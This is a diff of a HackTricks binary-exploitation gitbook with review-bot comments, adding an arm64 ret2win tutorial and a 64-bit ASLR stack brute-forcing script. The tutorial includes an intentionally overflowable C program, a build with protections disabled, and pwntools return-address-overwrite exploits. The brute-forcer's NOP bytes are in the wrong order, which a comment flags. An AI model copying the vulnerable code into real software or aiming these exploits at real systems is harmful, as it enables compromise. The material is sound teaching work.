GITBOOK-4305: No subject
BIN
.gitbook/assets/image (1202).png
Normal file
After Width: | Height: | Size: 599 KiB |
BIN
.gitbook/assets/image (1203).png
Normal file
After Width: | Height: | Size: 248 KiB |
BIN
.gitbook/assets/image (1204).png
Normal file
After Width: | Height: | Size: 220 KiB |
BIN
.gitbook/assets/image (1205).png
Normal file
After Width: | Height: | Size: 131 KiB |
BIN
.gitbook/assets/image (1206).png
Normal file
After Width: | Height: | Size: 124 KiB |
BIN
.gitbook/assets/image (1207).png
Normal file
After Width: | Height: | Size: 29 KiB |
BIN
.gitbook/assets/image (1208).png
Normal file
After Width: | Height: | Size: 94 KiB |
BIN
.gitbook/assets/image (1209).png
Normal file
After Width: | Height: | Size: 96 KiB |
BIN
.gitbook/assets/image (1210).png
Normal file
After Width: | Height: | Size: 238 KiB |
BIN
.gitbook/assets/image (1211).png
Normal file
After Width: | Height: | Size: 218 KiB |
|
@ -112,7 +112,7 @@ You can **create a free account** [**here**](https://serpapi.com/users/sign\_up)
|
||||||
|
|
||||||
### [WebSec](https://websec.nl/)
|
### [WebSec](https://websec.nl/)
|
||||||
|
|
||||||
<figure><img src=".gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
<figure><img src=".gitbook/assets/websec (1).svg" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
[**WebSec**](https://websec.nl) is a professional cybersecurity company based in **Amsterdam** which helps **protecting** businesses **all over the world** against the latest cybersecurity threats by providing **offensive-security services** with a **modern** approach.
|
[**WebSec**](https://websec.nl) is a professional cybersecurity company based in **Amsterdam** which helps **protecting** businesses **all over the world** against the latest cybersecurity threats by providing **offensive-security services** with a **modern** approach.
|
||||||
|
|
||||||
|
@ -122,7 +122,7 @@ Another cool thing about WebSec is that unlike the industry average WebSec is **
|
||||||
|
|
||||||
In addition to the above WebSec is also a **committed supporter of HackTricks.**
|
In addition to the above WebSec is also a **committed supporter of HackTricks.**
|
||||||
|
|
||||||
<figure><img src=".gitbook/assets/websec (1).svg" alt=""><figcaption></figcaption></figure>
|
{% embed url="https://www.youtube.com/watch?v=Zq2JycGDCPM" %}
|
||||||
|
|
||||||
## License & Disclaimer
|
## License & Disclaimer
|
||||||
|
|
||||||
|
|
|
@ -689,10 +689,12 @@
|
||||||
* [Exploiting Tools](binary-exploitation/basic-binary-exploitation-methodology/tools/README.md)
|
* [Exploiting Tools](binary-exploitation/basic-binary-exploitation-methodology/tools/README.md)
|
||||||
* [PwnTools](binary-exploitation/basic-binary-exploitation-methodology/tools/pwntools.md)
|
* [PwnTools](binary-exploitation/basic-binary-exploitation-methodology/tools/pwntools.md)
|
||||||
* [Stack Overflow](binary-exploitation/stack-overflow/README.md)
|
* [Stack Overflow](binary-exploitation/stack-overflow/README.md)
|
||||||
* [Stack Shellcode](binary-exploitation/stack-overflow/stack-shellcode.md)
|
|
||||||
* [Stack Pivoting - EBP2Ret - EBP chaining](binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md)
|
|
||||||
* [Pointer Redirecting](binary-exploitation/stack-overflow/pointer-redirecting.md)
|
* [Pointer Redirecting](binary-exploitation/stack-overflow/pointer-redirecting.md)
|
||||||
* [Ret2win](binary-exploitation/stack-overflow/ret2win.md)
|
* [Ret2win](binary-exploitation/stack-overflow/ret2win/README.md)
|
||||||
|
* [Ret2win - arm64](binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md)
|
||||||
|
* [Stack Shellcode](binary-exploitation/stack-overflow/stack-shellcode/README.md)
|
||||||
|
* [Stack Shellcode - arm64](binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md)
|
||||||
|
* [Stack Pivoting - EBP2Ret - EBP chaining](binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md)
|
||||||
* [Uninitialized Variables](binary-exploitation/stack-overflow/uninitialized-variables.md)
|
* [Uninitialized Variables](binary-exploitation/stack-overflow/uninitialized-variables.md)
|
||||||
* [ROP - Return Oriented Programing](binary-exploitation/rop-return-oriented-programing/README.md)
|
* [ROP - Return Oriented Programing](binary-exploitation/rop-return-oriented-programing/README.md)
|
||||||
* [Ret2csu](binary-exploitation/rop-return-oriented-programing/ret2csu.md)
|
* [Ret2csu](binary-exploitation/rop-return-oriented-programing/ret2csu.md)
|
||||||
|
|
|
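Review bot: moving `ret2win.md` to `ret2win/README.md` and `stack-shellcode.md` to `stack-shellcode/README.md` changes both pages' URLs, so any page that still links the old `.md` paths will break after this lands. The ret2syscall and stack-overflow README hunks in this commit update their links, but it is worth grepping the whole book for `stack-overflow/ret2win.md` and `stack-overflow/stack-shellcode.md` before merging, and adding `redirects` entries for the two old paths in `.gitbook.yaml` so external links and search results keep resolving. The `Stack Shellcode` and `Stack Pivoting` entries are removed above and re-added below `Ret2win - arm64`, which is fine, but the diff reads as a deletion; a note in the commit message that this is a reorder plus two new arm64 pages would help whoever bisects later.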
@ -98,9 +98,80 @@ for off in range(0xb7000000, 0xb8000000, 0x1000):
|
||||||
* If attacking a remote server, you could try to **brute-force the address of the `libc` function `usleep`**, passing as argument 10 (for example). If at some point the **server takes 10s extra to respond**, you found the address of this function.
|
* If attacking a remote server, you could try to **brute-force the address of the `libc` function `usleep`**, passing as argument 10 (for example). If at some point the **server takes 10s extra to respond**, you found the address of this function.
|
||||||
|
|
||||||
{% hint style="success" %}
|
{% hint style="success" %}
|
||||||
In 64bit systems the entropy is much higher and this isn't possible.
|
In 64bit systems the entropy is much higher and this shouldn't possible.
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
|
### 64 bits stack brute-forcing
|
||||||
|
|
||||||
|
It's possible to occupy a big part of the stack with env variables and then try to abuse the binary hundreds/thousands of times locally to exploit it.\
|
||||||
|
The following code shows how it's possible to **just select an address in the stack** and every **few hundreds of executions** that address will contain the **NOP instruction**:
|
||||||
|
|
||||||
|
```c
|
||||||
|
//clang -o aslr-testing aslr-testing.c -fno-stack-protector -Wno-format-security -no-pie
|
||||||
|
#include <stdio.h>
|
||||||
|
|
||||||
|
int main() {
|
||||||
|
unsigned long long address = 0xffffff1e7e38;
|
||||||
|
unsigned int* ptr = (unsigned int*)address;
|
||||||
|
unsigned int value = *ptr;
|
||||||
|
printf("The 4 bytes from address 0xffffff1e7e38: 0x%x\n", value);
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
```python
|
||||||
|
import subprocess
|
||||||
|
import traceback
|
||||||
|
|
||||||
|
# Start the process
|
||||||
|
nop = b"\xD5\x1F\x20\x03" # ARM64 NOP transposed
|
||||||
|
n_nops = int(128000/4)
|
||||||
|
shellcode_env_var = nop * n_nops
|
||||||
|
|
||||||
|
# Define the environment variables you want to set
|
||||||
|
env_vars = {
|
||||||
|
'a': shellcode_env_var,
|
||||||
|
'b': shellcode_env_var,
|
||||||
|
'c': shellcode_env_var,
|
||||||
|
'd': shellcode_env_var,
|
||||||
|
'e': shellcode_env_var,
|
||||||
|
'f': shellcode_env_var,
|
||||||
|
'g': shellcode_env_var,
|
||||||
|
'h': shellcode_env_var,
|
||||||
|
'i': shellcode_env_var,
|
||||||
|
'j': shellcode_env_var,
|
||||||
|
'k': shellcode_env_var,
|
||||||
|
'l': shellcode_env_var,
|
||||||
|
'm': shellcode_env_var,
|
||||||
|
'n': shellcode_env_var,
|
||||||
|
'o': shellcode_env_var,
|
||||||
|
'p': shellcode_env_var,
|
||||||
|
}
|
||||||
|
|
||||||
|
cont = 0
|
||||||
|
while True:
|
||||||
|
cont += 1
|
||||||
|
|
||||||
|
if cont % 10000 == 0:
|
||||||
|
break
|
||||||
|
|
||||||
|
print(cont, end="\r")
|
||||||
|
# Define the path to your binary
|
||||||
|
binary_path = './aslr-testing'
|
||||||
|
|
||||||
|
try:
|
||||||
|
process = subprocess.Popen(binary_path, env=env_vars, stdout=subprocess.PIPE, text=True)
|
||||||
|
output = process.communicate()[0]
|
||||||
|
if "0xd5" in str(output):
|
||||||
|
print(str(cont) + " -> " + output)
|
||||||
|
except Exception as e:
|
||||||
|
print(e)
|
||||||
|
print(traceback.format_exc())
|
||||||
|
pass
|
||||||
|
```
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1211).png" alt="" width="563"><figcaption></figcaption></figure>
|
||||||
|
|
||||||
### Local Information (`/proc/[pid]/stat`)
|
### Local Information (`/proc/[pid]/stat`)
|
||||||
|
|
||||||
The file **`/proc/[pid]/stat`** of a process is always readable by everyone and it **contains interesting** information such as:
|
The file **`/proc/[pid]/stat`** of a process is always readable by everyone and it **contains interesting** information such as:
|
||||||
|
|
|
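Review bot: the NOP bytes in the new Python brute-forcer are in the wrong order for a little-endian ARM64 process. The instruction is 0xD503201F, so its in-memory encoding is `\x1f\x20\x03\xd5`; the line `nop = b"\xD5\x1F\x20\x03" # ARM64 NOP transposed` writes the bytes rotated, so only a read that starts one byte into a repeat decodes as a NOP, and the check `if "0xd5" in str(output):` also accepts the rotated values (0xd51f2003 and any other value whose top byte is 0xd5), so a reported hit does not prove the chosen address would execute as a NOP. Use the little-endian bytes and compare the printed value against `0xd503201f` exactly. The edit to the hint also drops a word: `this shouldn't possible` should read `this shouldn't be possible`, and since the section added right below shows that stack brute-forcing on 64-bit is feasible when the attacker controls a large environment, the hint would be more accurate if it were limited to brute-forcing libc function addresses rather than a blanket statement. Minor: `while True` with `if cont % 10000 == 0: break` is just `for cont in range(1, 10000)`, and the C program hardcodes the address inside the format string; `printf("The 4 bytes from address 0x%llx: 0x%x\n", address, value)` keeps the two in sync when someone changes `address`.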
@ -28,7 +28,7 @@ In order to prepare the call for the **syscall** it's needed the following confi
|
||||||
So, basically it's needed to write the string `/bin/sh` somewhere and then perform the `syscall` (being aware of the padding needed to control the stack). For this, we need a gadget to write `/bin/sh` in a known area.
|
So, basically it's needed to write the string `/bin/sh` somewhere and then perform the `syscall` (being aware of the padding needed to control the stack). For this, we need a gadget to write `/bin/sh` in a known area.
|
||||||
|
|
||||||
{% hint style="success" %}
|
{% hint style="success" %}
|
||||||
Another interesting syscall to call is **`mprotect`** which would allow an attacker to **modify the permissions of a page in memory**. This can be combined with [**ret2shellcode**](../stack-overflow/stack-shellcode.md).
|
Another interesting syscall to call is **`mprotect`** which would allow an attacker to **modify the permissions of a page in memory**. This can be combined with [**ret2shellcode**](../stack-overflow/stack-shellcode/).
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
## Register gadgets
|
## Register gadgets
|
||||||
|
|
|
@ -77,16 +77,16 @@ However, in other scenarios maybe just **overwriting some variables values in th
|
||||||
|
|
||||||
In this type of CTF challenges, there is a **function** **inside** the binary that is **never called** and that **you need to call in order to win**. For these challenges you just need to find the **offset to overwrite the return address** and **find the address of the function** to call (usually [**ASLR**](../common-binary-protections-and-bypasses/aslr/) would be disabled) so when the vulnerable function returns, the hidden function will be called:
|
In this type of CTF challenges, there is a **function** **inside** the binary that is **never called** and that **you need to call in order to win**. For these challenges you just need to find the **offset to overwrite the return address** and **find the address of the function** to call (usually [**ASLR**](../common-binary-protections-and-bypasses/aslr/) would be disabled) so when the vulnerable function returns, the hidden function will be called:
|
||||||
|
|
||||||
{% content-ref url="ret2win.md" %}
|
{% content-ref url="ret2win/" %}
|
||||||
[ret2win.md](ret2win.md)
|
[ret2win](ret2win/)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
### Stack Shellcode
|
### Stack Shellcode
|
||||||
|
|
||||||
In this scenario the attacker could place a shellcode in the stack and abuse the controlled EIP/RIP to jump to the shellcode and execute arbitrary code:
|
In this scenario the attacker could place a shellcode in the stack and abuse the controlled EIP/RIP to jump to the shellcode and execute arbitrary code:
|
||||||
|
|
||||||
{% content-ref url="stack-shellcode.md" %}
|
{% content-ref url="stack-shellcode/" %}
|
||||||
[stack-shellcode.md](stack-shellcode.md)
|
[stack-shellcode](stack-shellcode/)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
### ROP & Ret2... techniques
|
### ROP & Ret2... techniques
|
||||||
|
|
|
@ -89,8 +89,8 @@ The Python script sends a carefully crafted message that, when processed by the
|
||||||
|
|
||||||
## Protections
|
## Protections
|
||||||
|
|
||||||
* [**PIE**](../common-binary-protections-and-bypasses/pie/) **should be disabled** for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded. In some cases, when the function that causes the overflow is `read` or similar, you can do a **Partial Overwrite** of 1 or 2 bytes to change the return address to be the win function. Because of how ASLR works, the last three hex nibbles are not randomized, so there is a **1/16 chance** (1 nibble) to get the correct return address.
|
* [**PIE**](../../common-binary-protections-and-bypasses/pie/) **should be disabled** for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded. In some cases, when the function that causes the overflow is `read` or similar, you can do a **Partial Overwrite** of 1 or 2 bytes to change the return address to be the win function. Because of how ASLR works, the last three hex nibbles are not randomized, so there is a **1/16 chance** (1 nibble) to get the correct return address.
|
||||||
* [**Stack Canaries**](../common-binary-protections-and-bypasses/stack-canaries/) should be also disabled or the compromised EIP return address won't never be followed.
|
* [**Stack Canaries**](../../common-binary-protections-and-bypasses/stack-canaries/) should be also disabled or the compromised EIP return address won't never be followed.
|
||||||
|
|
||||||
## Other examples & References
|
## Other examples & References
|
||||||
|
|
||||||
|
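Review bot: the file moves one directory deeper (`ret2win.md` to `ret2win/README.md`), so every relative link in it needs the extra `../`, not only the PIE and Stack Canaries links shown in this hunk; grep the moved file for `](../` to catch any others (the same check applies to the `stack-shellcode/README.md` move below). The unchanged text in this hunk also keeps the double negative `won't never be followed`; since the line is touched anyway it could read `will never be followed`.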
@ -114,6 +114,12 @@ The Python script sends a carefully crafted message that, when processed by the
|
||||||
* [https://7rocky.github.io/en/ctf/other/blackhat-ctf/fno-stack-protector/](https://7rocky.github.io/en/ctf/other/blackhat-ctf/fno-stack-protector/)
|
* [https://7rocky.github.io/en/ctf/other/blackhat-ctf/fno-stack-protector/](https://7rocky.github.io/en/ctf/other/blackhat-ctf/fno-stack-protector/)
|
||||||
* 64 bit, relro, no canary, nx, pie. Partial overwrite to call the win function (ret2win)
|
* 64 bit, relro, no canary, nx, pie. Partial overwrite to call the win function (ret2win)
|
||||||
|
|
||||||
|
## ARM64 Example
|
||||||
|
|
||||||
|
{% content-ref url="ret2win-arm64.md" %}
|
||||||
|
[ret2win-arm64.md](ret2win-arm64.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
212
binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md
Normal file
|
@ -0,0 +1,212 @@
|
||||||
|
# Ret2win - arm64
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
Find an introduction to arm64 in:
|
||||||
|
|
||||||
|
{% content-ref url="../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md" %}
|
||||||
|
[arm64-basic-assembly.md](../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
|
## Code 
|
||||||
|
|
||||||
|
```c
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <unistd.h>
|
||||||
|
|
||||||
|
void win() {
|
||||||
|
printf("Congratulations!\n");
|
||||||
|
}
|
||||||
|
|
||||||
|
void vulnerable_function() {
|
||||||
|
char buffer[64];
|
||||||
|
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
|
||||||
|
}
|
||||||
|
|
||||||
|
int main() {
|
||||||
|
vulnerable_function();
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
Compile without pie and canary:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
clang -o ret2win ret2win.c -fno-stack-protector -Wno-format-security -no-pie
|
||||||
|
```
|
||||||
|
|
||||||
|
## Finding the offset
|
||||||
|
|
||||||
|
### Pattern option
|
||||||
|
|
||||||
|
This example was created using [**GEF**](https://github.com/bata24/gef):
|
||||||
|
|
||||||
|
Stat gdb with gef, create pattern and use it:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
gdb -q ./ret2win
|
||||||
|
pattern create 200
|
||||||
|
run
|
||||||
|
```
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1202).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
arm64 will try to return to the address in the register x30 (which was compromised), we can use that to find the pattern offset:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
pattern search $x30
|
||||||
|
```
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1203).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
**The offset is 72 (9x48).**
|
||||||
|
|
||||||
|
### Stack offset option
|
||||||
|
|
||||||
|
Start by getting the stack address where the pc register is stored:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
gdb -q ./ret2win
|
||||||
|
b *vulnerable_function + 0xc
|
||||||
|
run
|
||||||
|
info frame
|
||||||
|
```
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1204).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
Now set a breakpoint after the `read()` and continue until the `read()` is executed and set a pattern such as 13371337:
|
||||||
|
|
||||||
|
```
|
||||||
|
b *vulnerable_function+28
|
||||||
|
c
|
||||||
|
```
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1205).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
Find where this pattern is stored in memory:
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1206).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
Then: **`0xfffffffff148 - 0xfffffffff100 = 0x48 = 72`**
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1207).png" alt="" width="339"><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
## No PIE
|
||||||
|
|
||||||
|
### Regular
|
||||||
|
|
||||||
|
Get the address of the **`win`** function:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
objdump -d ret2win | grep win
|
||||||
|
ret2win: file format elf64-littleaarch64
|
||||||
|
00000000004006c4 <win>:
|
||||||
|
```
|
||||||
|
|
||||||
|
Exploit:
|
||||||
|
|
||||||
|
```python
|
||||||
|
from pwn import *
|
||||||
|
|
||||||
|
# Configuration
|
||||||
|
binary_name = './ret2win'
|
||||||
|
p = process(binary_name)
|
||||||
|
|
||||||
|
# Prepare the payload
|
||||||
|
offset = 72
|
||||||
|
ret2win_addr = p64(0x00000000004006c4)
|
||||||
|
payload = b'A' * offset + ret2win_addr
|
||||||
|
|
||||||
|
# Send the payload
|
||||||
|
p.send(payload)
|
||||||
|
|
||||||
|
# Check response
|
||||||
|
print(p.recvline())
|
||||||
|
p.close()
|
||||||
|
```
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1208).png" alt="" width="375"><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
### Off-by-2
|
||||||
|
|
||||||
|
Instead of overwritting all the return address we are going to overwrite **only the last 2 bytes** with `0x06c4`.
|
||||||
|
|
||||||
|
```python
|
||||||
|
from pwn import *
|
||||||
|
|
||||||
|
# Configuration
|
||||||
|
binary_name = './ret2win'
|
||||||
|
p = process(binary_name)
|
||||||
|
|
||||||
|
# Prepare the payload
|
||||||
|
offset = 72
|
||||||
|
ret2win_addr = p16(0x06c4)
|
||||||
|
payload = b'A' * offset + ret2win_addr
|
||||||
|
|
||||||
|
# Send the payload
|
||||||
|
p.send(payload)
|
||||||
|
|
||||||
|
# Check response
|
||||||
|
print(p.recvline())
|
||||||
|
p.close()
|
||||||
|
```
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1209).png" alt="" width="375"><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
## With PIE
|
||||||
|
|
||||||
|
{% hint style="success" %}
|
||||||
|
Compile the binary **without the `-no-pie` argument**
|
||||||
|
{% endhint %}
|
||||||
|
|
||||||
|
### Off-by-2
|
||||||
|
|
||||||
|
Without a leak we don't know the exact address of the winning function but we can know the offset of the function from the binary and knowing that the return address we are overwriting is already pointing to a close address, it's possible to leak the offset to the win function (**0x7d4**) in this case and just use that offset:
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1210).png" alt="" width="563"><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
```python
|
||||||
|
from pwn import *
|
||||||
|
|
||||||
|
# Configuration
|
||||||
|
binary_name = './ret2win'
|
||||||
|
p = process(binary_name)
|
||||||
|
|
||||||
|
# Prepare the payload
|
||||||
|
offset = 72
|
||||||
|
ret2win_addr = p16(0x07d4)
|
||||||
|
payload = b'A' * offset + ret2win_addr
|
||||||
|
|
||||||
|
# Send the payload
|
||||||
|
p.send(payload)
|
||||||
|
|
||||||
|
# Check response
|
||||||
|
print(p.recvline())
|
||||||
|
p.close()
|
||||||
|
```
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
|
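Review bot: the "With PIE" off-by-2 section describes the win offset as something "it's possible to leak", but nothing is leaked: `0x7d4` is the offset of `win` inside the binary and comes straight from `objdump`, exactly as in the No PIE case; what makes the partial overwrite work is that the saved x30 already holds an address inside the same image, so its upper bytes are correct. It should also say what the success rate is. With ASLR enabled the ELF base is randomized at page granularity, so on a 4 KiB-page kernel the low 12 bits are fixed but bits 12-15 are random: `p16(0x07d4)` guesses one nibble and succeeds about one run in 16 (matching the "1/16 chance" statement in the ret2win README); on a 64 KiB-page kernel it would succeed every time. Either state that ASLR is off for the demo or wrap the exploit in a retry loop. Two typos: `Stat gdb with gef` should be `Start gdb with gef`, and `The offset is 72 (9x48)` should be `(0x48)`, matching the `0xfffffffff148 - 0xfffffffff100 = 0x48 = 72` line later on.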
@ -214,6 +214,12 @@ Check the ret2esp technique here:
|
||||||
* [https://guyinatuxedo.github.io/17-stack\_pivot/insomnihack18\_onewrite/index.html](https://guyinatuxedo.github.io/17-stack\_pivot/insomnihack18\_onewrite/index.html)
|
* [https://guyinatuxedo.github.io/17-stack\_pivot/insomnihack18\_onewrite/index.html](https://guyinatuxedo.github.io/17-stack\_pivot/insomnihack18\_onewrite/index.html)
|
||||||
* 64 bit, no relro, canary, nx and pie. The program grants a leak for stack or pie and a WWW of a qword. First get the stack leak and use the WWW to go back and get the pie leak. Then use the WWW to create an eternal loop abusing `.fini_array` entries + calling `__libc_csu_fini` ([more info here](../arbitrary-write-2-exec/www2exec-.dtors-and-.fini\_array.md)). Abusing this "eternal" write, it's written a ROP chain in the .bss and end up calling it pivoting with RBP.
|
* 64 bit, no relro, canary, nx and pie. The program grants a leak for stack or pie and a WWW of a qword. First get the stack leak and use the WWW to go back and get the pie leak. Then use the WWW to create an eternal loop abusing `.fini_array` entries + calling `__libc_csu_fini` ([more info here](../arbitrary-write-2-exec/www2exec-.dtors-and-.fini\_array.md)). Abusing this "eternal" write, it's written a ROP chain in the .bss and end up calling it pivoting with RBP.
|
||||||
|
|
||||||
|
## ARM64
|
||||||
|
|
||||||
|
In ARM64, the **prologue and epilogues** of the functions **don't store and retrieve the SP registry** in the stack. Therefore, by default, you **won't be able to control the SP registry** by overwriting some data inside the stack.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
|
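Review bot: the new ARM64 paragraph says "SP registry" twice where it means "SP register", and the reason given could be one sentence more precise. An AArch64 prologue is typically `stp x29, x30, [sp, #-N]!` and the epilogue `ldp x29, x30, [sp], #N` followed by `ret`: the stack pointer is only ever adjusted by an immediate and is never loaded from memory, which is why the EBP2Ret trick (x86 `leave` does `mov rsp, rbp; pop rbp`, so a corrupted saved frame pointer becomes the new stack pointer) has no direct equivalent. Corrupting the saved x29 only matters if the caller later dereferences the frame pointer. The section currently ends after that one paragraph with no alternative; a pointer to ret2csu / register-setting gadgets, or a note that pivoting on arm64 needs a gadget that moves a controlled register into SP (`mov sp, x..` or `add sp, x.., #..`), would stop the reader at a dead end less abruptly.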
@ -90,9 +90,9 @@ The **NOP slide** (`asm('nop')`) is used to increase the chance that execution w
|
||||||
|
|
||||||
## Protections
|
## Protections
|
||||||
|
|
||||||
* [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **should be disabled** for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded.
|
* [**ASLR**](../../common-binary-protections-and-bypasses/aslr/) **should be disabled** for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded.
|
||||||
* [**Stack Canaries**](../common-binary-protections-and-bypasses/stack-canaries/) should be also disabled or the compromised EIP return address won't never be followed.
|
* [**Stack Canaries**](../../common-binary-protections-and-bypasses/stack-canaries/) should be also disabled or the compromised EIP return address won't never be followed.
|
||||||
* [**NX**](../common-binary-protections-and-bypasses/no-exec-nx.md) **stack** protection would prevent the execution of the shellcode inside the stack because that region won't be executable.
|
* [**NX**](../../common-binary-protections-and-bypasses/no-exec-nx.md) **stack** protection would prevent the execution of the shellcode inside the stack because that region won't be executable.
|
||||||
|
|
||||||
## Other Examples & References
|
## Other Examples & References
|
||||||
|
|
|
@ -0,0 +1,107 @@
|
||||||
|
# Stack Shellcode - arm64
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
